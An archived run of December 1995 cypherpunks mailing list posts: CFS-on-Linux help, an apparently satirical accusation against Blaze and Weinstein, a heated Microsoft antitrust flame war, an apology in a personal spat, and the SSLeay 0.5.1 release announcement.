To: Alex de Joode <usura@berserk.com>
Subject: Re: CFS and Linux
In-Reply-To: <199512201915.UAA00215@asylum.berserk.com>
Message-ID: <199512210440.XAA28196@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Is there anyone out there that has CFS running with Linux ?
> 
> It installs fine on BSDi 2.0 but I'm unable to install it 
> under Linux, I would appreciate it if some one would help
> me out.
> 
>  -AJ-

I don't run Linux, and every time I open my mouth it seems to provoke
a flame-fest, but I'll risk responding anyway.

I'm told that all versions of CFS since 1.0.4 (the latest is 1.3.1)
do work out-of-the-box under *some* releases of Linux and with some
coaxing on the others.

I'm not sure exactly what problem you're having, but the most common
CFS-Linux problem that people complain about has to do with the rpcgen
output not being in the format expected by the rest of CFS.  There
seem to be two things you can do about this:  get a version of rpcgen
that generates the "standard" (original Sun) names for the functions it
generates, or just grab the rpcgen output from the cfs-users mailing list
archive ("echo help | mail cfs-users-request@research.att.com" for details).

Or are you able to compile it but not get it installed?  I've not heard
of any problems here.  If so, you might try the cfs-users@research.att.com
mailing list and see if someone there can help out.

-matt

NB to "Bill Gates" and friends:  To save you the trouble of pointing it out,
I hereby admit that I'm a commie-fascist brainwashed sold out member of the
military-industrial complex who has been programmed by his masters to
infiltrate the cypherpunks in order to sap and impurify their precious
bodily fluids.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 20 Dec 95 23:57:23 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <9512210757.AA25763@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From the Fool on the Hill(aka ECafe):

ATT and Netscape are both tools of the CIA/NSA.
Blaze and Weinstein are in on the plot to force 
GAK upon us....
..Only true visionaries like myself and Dr. 
Frederic B Cohen are telling it like it is; 
everyone else has had the wool pulled over their 
eyes by the NSA/ATT/Netscape axis.
...................................................

Surely you're joking, Mr. Feynman!
Cpunks, do you not "get it" -

This has to be a jest, poking at some of the attitudes which have been 
expressed on the list.  I think it's a bit late, though, as most of the 
excitement has calmed, and this must be why it's not recognizable.  (if you 
think it's worth a comment, at least make it *funny*!, right.)

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 20 Dec 95 23:57:34 PST
To: attila <attila@primenet.com>
Subject: Re: on web standards: sent to Markoff
Message-ID: <9512210757.AA25767@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


Attila:

I'm surprised at you. I thought you were anarcho-capitalist. Oh, well; I have a 
few pithy comments in reply to your post (but anything beyond this will be in 
private email).

I'm tempted to say back to you, as you just recently stated: "if you have not 
walked in the other's shoes, keep silent."  Have you read any of the books on 
Microsoft or Bill Gates?  I think this would provide you with additional 
perspective on your conclusions about him and the company.

But think about this:

.  no company which MS has done business with has been coerced into dealing 
with the company and its products.  Those who felt compelled to do business on 
Billg's terms were influenced by their desire to reap the lucrative benefits of 
it. 
  
.  no customer has been coerced into purchasing the products offered;  they 
were not prevented from shopping for computers from companies which do not 
pre-install the OS; if it was already installed on the machines they purchased, 
they were free to delete it, they were not coerced into using it or into 
upgrading to the next release.

.  not only have many software companies not taken advantage of the 
opportunities created for cashing in on the unexpected popularity of MS 
software, 
.  there have been occasions where competitors failed to see opportunities in 
the market which Microsoft did and took aim for, or
.  attempted business deals/associations among competitor software companies 
did not come about, thus failing to create a concerted competitive threat to 
Microsoft, or 
.  a dominant software product from a competitor suffered in the market place, 
(sometimes from the fault of "bad management"), thus again giving the advantage 
to Microsoft.

Often it has been what the competition *didn't do*, which gave Microsoft the 
advantage in the "market place", rather than any amazing magical business savvy 
or "unethical business practices".  

Nevertheless, as someone at MS said, "it isn't the customers who are 
complaining". There have been many willing participants, apparently, who have 
cooperated (or "conspired", if you will) in making the company the success 
which it has become.  And continue to do so.

  ..
Blanc

p.s.  Nuri-logical:  I like your idea for a "dog-eat-dog" welfare fund.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 21 Dec 95 00:22:40 PST
To: attila <attila@primenet.com>
Subject: attila's fallacious flagwaving
In-Reply-To: <Pine.BSD.3.91.951221035112.27593J-100000@usr1.primenet.com>
Message-ID: <199512210819.AAA01149@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>1)	you obviously have no concept of anti-trust or anti-competitive 
>	law, practice or the public interest it represents. I wrote my
>	thesis on government regulation of monopoly v. monopoly 
>        franchises such as utilities.

neither do you, mr. pseudonym. <g>  notice how nothing that MS does even
remotely resembles the *utility* business, and how painfully absurd it would
be to imply such a thing were so...

your point above, while seemingly implying something significant,
in itself gives absolutely no evidence for what you claim (i.e. that I don't
have a clue). this is quite similar to your essay in which you say that
"MS *clearly* violates free/fair trade" with nothing to support your
case other than innuendo. I am not going to play ----sizewars with you,
I wouldn't want to damage your obviously fragile selfesteem.  I wouldn't
*want* to be an expert on the ridiculous legislative laws that go under
the idea of "antitrust", which are just a convenient excuse in most cases
for the government to interfere with business when the public is whining
a lot.

>    2)  market domination can, and generally does, stifle competition, 
>	but it also kills innovation of alternatives.  Software companies
>	are too busy kissing arse with Bill, and threatened by Bill, 
>	to release software on other systems say unix or os/2. 

this is a subjective matter. you continually lace your claims with many
subjective claims that have no basis in fact. who is to decide what is
unfair and what is not? answer: a court. so far, no court has agreed with
you that MS has been involved in unfair trade. 

you seem to believe that you are the authority.
you have failed utterly to give a single concrete instance of how Microsoft
is *unfairly* stifling competition, although you have infinite innuendos
and seem to think that merely by saying things like "OS2" in your writing
that you have proved your case.

 it may be that Microsoft "stifles" 
competition because all of its competitors are simply *choosing* not to
compete with them on certain platforms and areas. now, 
*no*amount*of*legislation* will change what a company decides of their own
free will in this manner.

why is it a horrible calamity if other companies voluntarily *choose* not to
compete with microsoft? is microsoft putting a gun to anyone's head not
to compete with them? are they essentially paying people not to compete
with them? are they trying to sabotage their competitors by contract
killings on their programmers? no, they are succeeding because they 
have a *superior product*, *nothing* more sinister than that is going on.
no amount of wet-tissue-paper conspiracy theories ranting about API
documentation is going to change that.

>	a perfect example is Corel.  Corel was _very_ enthusiastic to 
>	release for OS/2, in fact they were ported to OS/2 before W95
>	released.  Shortly after the announcement, the honcho reversed
>	positions and canceled Rev 6 for OS/2 stating that Rev 2.5 which
>	has existed for some time, was "adequate" for OS/2. I am not going
>	to expose my inside source, as there will be retribution.

why is this a problem? companies change their course all the time based on
the competition. you think this is the first time a company decided to 
change course when they found out what a powerful competitor was doing?
*wrong*. obviously. but because MS is involved, you seem to think this
is a horrible injustice for mankind. there's no doubt that people voluntarily
choose not to compete with MS. MS voluntarily decided not to compete with
Intel for chip fabrication!! *surprise*.. likewise many software companies
choose not to compete with MS in particular areas that MS has *won* through
hard work.

MS is in the position of a marathon runner, not a tyrannical
despot as you imply. the *moment* that MS makes a bad strategic decision
or trips from their relentless pursuit of customer satisfaction, any one
of the numerous hyenas nipping at their hyenas will take advantage of the
slip.

>    3)  you are totally ignoring the comments on anti-trust and restraint
>	of trade. In general market terms, anti-trust is less important
>	than restraint of trade --Bill _clearly_ violates the rules on
>	restraint of trade, and therefore should be dismembered to avoid
>	lack of innovation as in #2 above. 

no amount of times of saying "Bill clearly violates [x]" will prove your case
without concrete examples, none of which you have provided. furthermore,
you are correct in that I am ignoring many of your comments about "markets".
you don't seem to understand this point: MS dominates in markets that they
*created*.

MS *created* the "widget" market. then to have other companies and individuals
such as yourself screech that they are being "excluded" from this market is
the height of hypocrisy, when these people voluntarily decided to "opt out"
at an early stage. this basic point of mine in my prior essay totally
sailed over your head.

 antitrust laws make sense in *pre*existing* 
markets that have come to be dominated by a single company, a "monopoly",
that seems to be trying to stifle competition. e.g. there are 5 railroad
companies, then suddenly there is only 1 that charges highway robbery. or, 
series of [x] barons collude to price fix.

what has MS done that
stifles competition? they stifle competition not by trying to overtly
prevent companies from competing. they "stifle competition" by being the
best there is. and you are free to change this by creating better software.
so far they are so ingenious in creating brilliant software that no one
has come close to their prowess.

why do you think that antitrust laws are the panacea for all problems in
markets? you haven't even proven that MS is a problem, you just take that
as a given. then you presume that because antitrust laws exist, they must
be sacred and they must apply. well, you look pretty silly to me trying to
apply your 19th century antitrust laws and feebleminded market ideas to
a state-of-the-art 20th century market that is doing just fine, thank you
very much, without interference from legislative busybodies like YOU.

do you recall the RAM "crisis" of a few years ago in which the Reagan 
administration accused Japan of "dumping" RAM chips? do you consider this
a success of legislation applied to high tech markets? if so you are
in the minority of all people in the technology industry.

now, dear sir, I admit that there are unethical businessmen, and I do
believe that government antitrust laws make sense when a single businessman
or a set of them are conspiring to seize a market and *prevent*competitors*
from even participating in that market. but nothing MS has done prevents
competitors a priori. it is a far different thing to have some kind of
skullduggery that prevents others from even attempting to get into business
(such as blackmail, sabotage, manipulating their employees, manipulating
resources, etc.). however we have a clearcut situation in which various 
companies are simply voluntarily *choosing* not to compete with microsoft.

and you complain there is not enough "innovation" in the technological field?
you think MS' dominance is preventing "innovation"? this is the most utter
ridiculousness I've heard in many years, and I'm embarrassed to see these
thoughts on the CP list, although not surprised they come from someone
without any interest in revealing their identity.

> 4)	you clearly have no concept of American free market policy. Yes, 
>	you may be very successful, even filthy rich, but when you 
>	stretch your rights to clearly offend the public interest, then 
>	anti-trust and restraint of trade laws serve the _needs_ of a 
>	free and _competitive/innovative_ market.  

these things you talk about with breathless patriotism are all *subjective*.
its *subjective* whether a given company is preventing competition or
free trade. there may be legislative criteria, but they are only subjective
guidelines that the courts have to try to figure out. you talk about 
operating systems as if it is a "public interest" area. well, sir, it seems
to me you can manipulate any company to any ends you like by insisting that
what they manufacture, after all, is in the "public interest" and therefore
this merits legislative brainless busybodiness. 

furthermore your silly effusive rhetoric above again fails utterly to 
tangibly demonstrate that MS is engaged in "unfair" practices. again you
seem to believe that MS is involved in unfair practices because

1. Gates is the richest man on the planet
2. other companies avoid competing with MS in some areas
3. OS2 is not as successful as windows
4. gosh darn it, there isn't enough *innovation* in software right now

>	America does not serve dinner to merchants who rape, pillage, and 
>	burn --as Bill Gates has crushed his opponents; the barbarians 
>	are punished.  There are grounds for criminal charges in Bill's 
>	actions.

all I can say is, hee, hee.  Bill Gates is ruthless, I grant you that:
he's ruthless in cutting the crap out of his products and the hot air
that customers *don't* want, and putting in the concrete meat that people
crave, and the marketplace has virtually deified him. to argue with 
MS's dominance is to argue against the people who buy his products.
why do you think they made the wrong choices? with their own cash?
your legislative solutions are designed to make decisions that individuals
are quite happy to make by themselves, thank you very much.

>    5)	you are incorrect in your assumptions that Gates was sued 
>	anonymously. 

I didn't say that. I said that his throat-slashing attackers would
*like* to be anonymous, as you delightfully prove.

>In the initial action by the DOJ, competitors were 
>	_asked_, by subpoena, for factual information by the DOJ.  The
>	_DOJ_ provided the shield in so much as Bill's barbarian actions
>	were of sufficient interest that evidence providers desired and
>	were given protection --not much different than the Federal
>	Witness Protection program. 

oh brother. yes, Bill is going to go out and hire hit men to get back
at all his enemies. (hee, hee, once again).

what you fail to understand is that if Bill decides that other companies
are trying to slash his own company's wrists, he has full authority to 
make business decisions regarding their declared enmity.

apparently your miracle system would be the following: any company can
lodge an anonymous complaint against their enemy and tie that enemy up
in court without revealing their own identity. after all, we need to
*protect* those accusers, don't we??

heh. in all your sparkling effusion about America (oh, I can hear the
flag flapping in the breeze behind you, god, this country is great)
you fail to consider the ideas about "confronting one's accuser" deemed
important enough to stick in the bill of rights...

can you reiterate why you think Bill is a "barbarian"?? hee, hee.

>	when CI$ and the rest banded together to protest Bill's obvious 
>	restraint of trade and stonewalling on hooks to Win95 for three 
>        months after Win95 released, they did not, and _could_ not, do 
>        so anonymously.

yes, what a pity they could not. let me tell you, I really feel your
pain. hahahahaha.

>    6)	how much is Bill paying _you_ for your efforts?  You obviously have
>	too much of an interest in the commercial outcome to be so ignorant.

my efforts in what? I have no financial ties to microsoft. I have friends
that work there. I have met plenty of people such as you who I think simply
fail to understand the concept of free enterprise, which does *not* promote
equality. in fact it rewards those people fantastically who can anticipate
markets and give consumers precisely what they want. and for this brilliant
gift of Gates' which is perhaps unparalleled in the history of business
(imho), you would like to cut up his painfully constructed kingdom so that
other people have a "chance" to "compete" in markets that Microsoft actually
originally created.
        
>    7) 	Your beliefs are one thing --state 'em, but don't speak for America
>	until you know the definition of the "public interest" and have 
>	some concept of anti-trust and restraint-of-trade legislation and
>	court rulings which have set the guidelines.  clutch it in,
>	_after_ your brain is in gear. 

your using terms such as "anti-trust" and "restraint of trade" do not make
you any authority either. I freely admit I am not an expert, but I also think 
that it's translucently obvious to even some of the most uneducated of people
that

1. if there are laws, they can be misapplied by bureaucrats to manipulate
companies. a situation where companies can sabotage each other merely through
litigation is a very serious red flag.

2. because a company is not doing well in the marketplace, is not reason
to introduce legislation or litigation against a successful company.
it is a reason to REJOICE that the market has sent a CLEAR MESSAGE
about WHAT IT DOESN'T WANT. any amount of whining and pleading by executives
in this company or their sniveling sycophants does not change this *basic*
reality.

IBM got a massive reality check in the marketplace in the early 80's. no 
matter how much they thought they were sacred, the *market* told them 
to **** off!!! because they didn't have a clue, and failed to listen to 
people who were *offering* them clues for free (Bill Gates) included.
and you whine that IBM "didn't sabotage themself", that "they weren't
their own worst enemy", they just didn't "adjust". oh, the grisly horror.
they had half a decade or more to get a clue about what the industry wanted,
and it didn't tolerate their egocentric vaporideology. cypherpunks, rejoice.

3. furthermore, because a lot of people hate a company and think that they
ought to be restrained, DOES NOT MAKE THIS LEGITIMATE or ACTIONABLE. 
people are notorious for wanting things they don't really want in the 
long run, not understanding the full consequences of their own demands. 
that is, perhaps even demanding something that is self-contradictory
(i.e. "kill microsoft so that we can get more software innovation", apparently
your own view).

4. antitrust laws were invented in the 19th century and originally were
related to railroad price gouging. there was some real skullduggery going
on in this period imho, but to compare Gates to these "robber barons" is
a disservice to humanity and a black mark on your karma record, imho <g>


what is my hidden agenda? to see the truth as it stands, when everyone around
is trying to see the truth that fits their hidden agenda. it's a rare gift
and a curse I assure you but it's known as "speaking one's truth". as someone
who has written software and understands the difficulty of *pleasing*customers*,
I congratulate Gates as a brilliant pioneer and visionary of the 20th century
and say a pox on all his detractors that paint him as a "barbarian" for his
sterling accomplishments in *customer*service* in an insanely difficult 
enterprise (software development).

I wouldn't have responded to your last message if you had more coherently
rebutted the actual message of my original essay. as it stands I just thought
I would send this little missive to further highlight your own cluelessness
and decrease your reputation on the list. having done this, I think now
I will probably just ignore you as inconsequential or take fun intermittent
potshots at you.

sweet dreams!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Wed, 20 Dec 95 17:10:00 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <199512210112.BAA05503@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm not trying to start a flame war, just telling
people what's REALLY happening.

ATT and Netscape are both tools of the CIA/NSA.
Blaze and Weinstein are in on the
plot to force GAK upon us.  Neither one
says enough about the evils of GAK on their
web page, so they're obviously for GAK and
only pretending to be against it to fool
the cypherpunks and curry favor with their NSA
masters.

Evidently the cypherpunks are all too impressed
with Blaze and Weinstein's master degrees to see
what's really happening.  Only true visionaries
like myself and Dr. Frederic B Cohen are telling
it like it is; everyone else has had the wool
pulled over their eyes by the NSA/ATT/Netscape axis.

It's amazing how clear everything becomes once
one stops taking the medication that THEY prescribed.

s/ Bill Gates





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 17:45:29 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <Pine.OSF.3.91.951220133424.7053C-100000@abernathy.tenet.edu>
Message-ID: <Pine.BSD.3.91.951221013748.27593C-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Harmon:

   Have you forgotten polite society?  Have you forgotten what your 
mother (should have) told you? "If you can not say something nice, don't 
say it."  --in particular refrain from personal attacks.  It is one thing 
to criticize, but it is another to blather unintelligibly without any 
knowledge than your own bias --and maybe your own intellectual ignorance 
and bigotry.  if you have not walked in the other's shoes, keep silent.

   now, if you will please excuse us, Perry has code to write --and I 
have code to write.  

   lastly, if you can not observe reasonable decorum, sign for 
alt.christian and post heretical ravings, and if you are desperate for 
attention or your name in lights, join alt.flame and have at it.

    ATTILA

On Wed, 20 Dec 1995, Dan Harmon wrote:

> 
> Perry,
> 
> the only crypto code you seem to do is the unintelligible postings
> that you send to the list.
> 
> .d
> 
> On Wed, 20 Dec 1995, Perry E. Metzger wrote:
> 
> > 
> > Dan Harmon writes:
> > > If this is what you consider contributing then you seem to have some
> > > deep problems that cannot be solved here. You may have to seek professional 
> > > help. Your continued and at times seemingly uncontrollable use of vulgar 
> > > language may indicate a neurobiological disorder such as Tourette's 
> > > syndrome.  You really should have it checked out before you harm yourself 
> > > and possibly others.
> > 
> > Thank you for the pseudopsychology, but really, all you've done is
> > further confirm my diagnosis of "non-contributing asshole".
> > 
> > When was the last time you did anything to actually help spread
> > cryptography, eh?
> > 
> > If you'll pardon me, I have crypto code to get back to.
> > 
> > .pm
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 19:15:28 PST
To: ECafe Anonymous Remailer <cpunk@remail.ecafe.org>
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <Pine.BSD.3.91.951221021253.27593D-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    OK, you're afraid of AT&T's lawyers. give me a break --who's chicken?
  they are not the government, they can not put you in jail and charges
  would never stick.
    both Blaze and Weinstein are bound by their employment contracts from 
    discussing political hot-potatoes. Weinstein did state rather 
  emphatically the opinions of the crew at Netscape did not conform to
  the apparently misguided statements of the dupe of government.
    blaze has sent plenty of code our way --even obtaining permission from
  at&t which is a real big brother.

    Have you been arrested and charged for crypto (non-export)?  - I have.
    Have you been arrested and charged for technology export?  - I have.
    Have you been raided more than once by the Feds?  - I have.
    Have you been excluded from at&t machines except murray hill and other
  labs because system managers don't like programmers knowledgeable in
  crypto and kernels ? - I have.

    Did I ever break into systems or alter data --no, that's not ethical.
    Could I? -yes, presumably some.

    "Membership" in Cypherpunks is not predicated on supporting _your_
  political agenda or beliefs. In fact, too much bandwidth is expended
  on arguing about political policy. I agree with Perry that postings 
  should be crypto design and implementation. 

    I have suggested that even announcements of crypto political
  activities should be put up like John Young posts: one paragraph
  synopsis and a reference to get the whole thing, but no discussion 
  --take it elsewhere.

    As for the attacks on Perry, they are inexcusable. You obviously 
  have no idea what crypto Perry codes.

    I have not published crypto code for a long time.  I am wrapping up, 
  after a _long_ hiatus, one which will really take their socks off --with
  their shoes still on.  I'd love to release it to public domain, but____

    What am I going to do with it? dunno, probably put the tape on the 
  shelf; I escaped the hard hand of justice, a poor man, the last time 
  when I tried to enter the code in evidence. Now I am "20 years older and
  deeper in debt" [Tennessee Ernie style]; is it worth it? I've done my
  time, and code has a signature. I think I would prefer to enjoy my five
  children and a few grandchildren. But it has been a good exercise....

    No, Mr. ECafe Anonymous _chicken_, you're the despicable party. Put 
  your imprint on your attacks and accusations: the Constitution says you 
  are entitled to _face_ your accusers.

    If you want to argue about constitutional or God given rights --do it in 
  other forums. If you want to denigrate blaze, weinstein, perry, and maybe 
  even tcmay, just drop yourself off the cpunk mailing list.

    meanwhile, get out of our collective faces and let us do a little 
  code, I intend to finish my work, and then I can have a depression
  trying to decide whether I want to go the round, again. 

    ATTILA
		==============================

On Wed, 20 Dec 1995, ECafe Anonymous Remailer wrote:

> I'm not trying to start a flame war. I'm
> sure these people are very smart and have
> written lots of good code. I'm sure they're
> very nice and never kick their dogs.  I'm
> just tired of people defending them as
> cypherpunks.
> 
> They aren't cypherpunks.
> 
> Neither has come out against GAK. They
> both carefully avoid committing to any
> statement. They want us to think they're
> "one of us" but they don't want to be
> pinned down because they are double dipping
> on both sides of the fence.
> 
> Blaze even does "research" on GAK. See
> his web page for evidence. Also the TIS
> report. The fact that he found a bug in
> clipper doesn't change this. It proves
> it.  He works for the government, via att.
> 
> Weinstein is actively promoting GAK by
> working at the company that the government
> has chosen to bring it to you now that
> att has failed.
> 
> WHY IS EVERYONE SO QUICK TO DEFEND THESE
> PEOPLE? DO THEY HAVE YOU ALL SO IMPRESSED
> WITH THEIR MASTERS DEGREES THAT YOU'RE AFRAID
> TO LOOK CLOSELY?
> 
> No, I did not post the RSA patch. I wouldn't
> touch any of that code with a 5 meter pole.
> 
> To the guy who says write code: I've
> written plenty of code. Clue: you're probably
> running some of it right now.
> 
> I'm anonymous because I've seen FIRST HAND
> what the att lawyers do to people who
> tell the wrong kind of truth.
> 
> Want me to be a 'nym. OK.
> 
> s/ Bill Gates (he has good lawyers that
> can handle att and netscape)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 20:49:27 PST
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Vladimir Z. Nuri's fallacious defense of MS
In-Reply-To: <199512210204.SAA26757@netcom20.netcom.com>
Message-ID: <Pine.BSD.3.91.951221035112.27593J-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Without forcing everybody to search the interline comments.

    1)	you obviously have no concept of anti-trust or anti-competitive 
	law, practice or the public interest it represents. I wrote my
	thesis on government regulation of monopoly v. monopoly 
        franchises such as utilities.

    2)  market domination can, and generally does, stifle competition, 
	but it also kills innovation of alternatives.  Software companies
	are too busy kissing arse with Bill, and threatened by Bill, 
	to release software on other systems say unix or os/2. 

	a perfect example is Corel.  Corel was _very_ enthusiastic to 
	release for OS/2, in fact they were ported to OS/2 before W95
	released.  Shortly after the announcement, the honcho reversed
	positions and canceled Rev 6 for OS/2 stating that Rev 2.5 which
	has existed for some time, was "adequate" for OS/2. I am not going
	to expose my inside source, as there will be retribution.

    3)  you are totally ignoring the comments on anti-trust and restraint
	of trade. In general market terms, anti-trust is less important
	than restraint of trade --Bill _clearly_ violates the rules on
	restraint of trade, and therefore should be dismembered to avoid
	lack of innovation as in #2 above. 

    4)	you clearly have no concept of American free market policy. Yes, 
	you may be very successful, even filthy rich, but when you 
	stretch your rights to clearly offend the public interest, then 
	anti-trust and restraint of trade laws serve the _needs_ of a 
	free and _competitive/innovative_ market.  

	America does not serve dinner to merchants who rape, pillage, and 
	burn --as Bill Gates has crushed his opponents; the barbarians 
	are punished.  There are grounds for criminal charges in Bill's 
	actions.

    5)	you are incorrect in your assumptions that Gates was sued 
	anonymously. In the initial action by the DOJ, competitors were 
	_asked_, by subpoena, for factual information by the DOJ.  The
	_DOJ_ provided the shield in so much as Bill's barbarian actions
	were of sufficient interest that evidence providers desired and
	were given protection --not much different than the Federal
	Witness Protection program. 

	when CI$ and the rest banded together to protest Bill's obvious 
	restraint of trade and stonewalling on hooks to Win95 for three 
        months after Win95 released, they did not, and _could_ not, do 
        so anonymously.

    6)	how much is Bill paying _you_ for your efforts?  You obviously have
	too much of an interest in the commercial outcome to be so ignorant.
        
    7) 	Your beliefs are one thing --state 'em, but don't speak for America
	until you know the definition of the "public interest" and have 
	some concept of anti-trust and restraint-of-trade legislation and
	court rulings which have set the guidelines.  clutch it in,
	_after_ your brain is in gear. 

    8)	no, I am not a liberal by any means. I am somewhere to the right 
	of the Libertarians, but definitely not an anarchist either.

      ANY FURTHER COMMENTS --FORWARD TO ALT.FLAME 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 21:20:30 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: An Apology to Mr. Merzger
In-Reply-To: <Pine.OSF.3.91.951220210124.8832D-100000@Joyce-Perkins.tenet.edu>
Message-ID: <Pine.BSD.3.91.951221051731.27593M-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    congratulations, Dan.  It takes a strong man to admit mistakes, and
courage to apologize! 

	attila


On Wed, 20 Dec 1995, Dan Harmon wrote:

> 
> Perry and members of this list,
> 
> I want to publicly apologize to Mr. Metzger. On reviewing the events of the
> day, it seems that I misunderstood a post by Perry. It seems that I was 
> missing a previous post that was being referenced. As to the 
> misunderstood message, I have to now agree with Perry and his response.
> 
> Please accept this apology.
> 
> Dan
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 20 Dec 95 23:55:10 PST
To: cypherpunks@toad.com
Subject: Cypherpunks resumes?
Message-ID: <199512210755.IAA28350@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Is there any chance of seeing a Cypherpunks 'Rogues Gallery' of sorts
in the archives anytime soon?  It would be nice to see a face connected
to the postings here.  Some of us don't get the chance of getting out
west for the parties. The only other thing I know about Tim May besides
being one of the Fathers of the Cypherpunks is that he was a naked hippie
in a hot tub at some party that Robert Hettinga was at some weeks ago.

That doesn't paint a good picture for me.

Thanks,

A.E.N.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Wed, 20 Dec 95 23:43:12 PST
To: ssl-users@mincom.oz.au
Subject: SSLeay 0.5.1
Message-ID: <Pine.SOL.3.91.951221173815.14679D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain




SSLeay 0.5.1 is now available.

It should be quite stable and has documentation for the lower level
cryptographic routines.

It is incompatible with the previous version but has no global variables
of consequence so it should be a much nicer starting point for threaded
libraries.  The library should have no memory leaks and the general
cryptographic functionality has been filled out more.

Tim Hudson <tjh@mincom.oz.au> will be updating the applications
available on ftp.psy.uq.oz.au in the next few days.

I leave for an 11 week holiday today so please address any problems and
questions to the ssl-users@mincom.oz.au mailing list (if it is of
general interest) or to ssleay@mincom.oz.au which goes to both
myself and Tim Hudson (who will be fixing any bugs while I'm away).

Announcing software and then leaving for 3 months would probably not
normally be considered a good practice but 0.5.0 has been tested for
the last week or so and I have faith in Tim Hudson's ability to fix 
bugs after doing pre-alpha testing for the last 6 months :-)

As per usual, the primary ftp site is
	ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL
	http://www.psy.uq.oz.au/~ftp/Crypto

Documentation on the demo application is sparse but I hope Tim Hudson
will be able to fill in the gaps while I'm away :-)

eric <eay@mincom.oz.au>
--
		SSLeay v 0.5.1 21/12/955
		Copyright (c) 1995, Eric Young
		All rights reserved.

This directory contains Eric Young's (eay@mincom.oz.au) implementation
of SSL and supporting libraries.

The current version of this library is available from
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-x.xx.tar.gz

There are patches to a number of internet applications which can be found in
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/

A Web page written by Tim Hudson <tjh@mincom.oz.au> can be found at
http://www.psy.uq.oz.au/~ftp/Crypto

This Library and programs are FREE for commercial and non-commercial
usage.  The only restriction is that I must be attributed with the
development of this code.  See the COPYRIGHT file for more details.
Donations would still be accepted :-).

The package includes

libssl.a:
	My implementation of Netscape's SSL v 2 protocol.  This library
	implements the SSL protocol.

libcrypto.a:
	General encryption and X509 stuff needed by SSL but not
	actually logically part of it.  It includes routines for the following:
	libdes - My libdes DES encryption package which has been floating
		around the net for a few years.  It includes 15
		'modes/variations' of DES (1, 2 and 3 key versions of ecb,
		cbc, cfb and ofb; pcbc and a more general form of cfb and ofb)
		a fast crypt(3), and routines to read passwords from the
		keyboard.
	RC4 encryption,
	IDEA encryption - 4 different modes, ecb, cbc, cfb and ofb.
	MD5 and MD2 message digest algorithms,
	SHA (SHA-0) and SHA-1 message digest algorithms,
	RSA encryption/decryption/key generation.  There is no limit
		on the number of bits.
	Diffie-Hellman key-exchange/key generation.  There is no limit
		on the number of bits.
	X509 encoding/decoding into/from binary ASN1 and a
		PEM based ascii-binary encoding which supports encryption with
		a private key.

Programs in this package include
	enc	- a general encryption program that can encrypt/decrypt using
		one of 17 different cipher/mode combinations.  The
		input/output can also be converted to/from base64
		ascii encoding.
	dgst	- a generate message digesting program that will generate
		message digests for any of md2, md5, sha (sha-0) or sha-1.
	asn1parse - parse and display the structure of an asn1 encoded
		binary file.
	rsa	- Manipulate RSA private keys.
	dh	- Manipulate Diffie-Hellman parameter files.
	crl	- Manipulate certificate revocation lists.
	x509	- Manipulate x509 certificates, self-sign certificates.
	req	- Manipulate PKCS#10 certificate requests and also
		  generate certificate requests.
	genrsa  - Generates an arbitrary sized RSA private key.
	gendh	- Generates a set of Diffie-Hellman parameters, the prime
		will be a strong prime.
	ca	- Create certificates from PKCS#10 certificate requests.
		This program also maintains a database of certificates
		issued.
	verify	- Check x509 certificate signatures.
	speed	- Benchmark SSLeay's ciphers.
	s_server - A test SSL server.
	s_client - A test SSL client.
	s_time	 - Benchmark SSL performance of SSL server programs.
	
Documents included are
	A Postscript and html reference manual
	(written by Tim Hudson tjh@mincom.oz.au).
	A list of text protocol references I used.
	An initial version of the library manual.

To install this package, read the INSTALL file.
This library has been compiled and tested on Solaris 2.[34] (sparc and x86),
SunOS 4.1.3, DGUX, OSF1 Alpha, HPUX 9, AIX 3.5(?), IRIX 5.[23],
LINUX, NeXT (intel). 

For people in the USA, it is possible to compile SSLeay to use RSA
Inc.'s public key library, RSAref.  From my understanding, it is
claimed by RSA inc. to be illegal to use my public key routines inside the USA.
Read doc/RSAref.doc on how to build with RSAref.

Read the documentation in the doc directory.  It is quite rough,
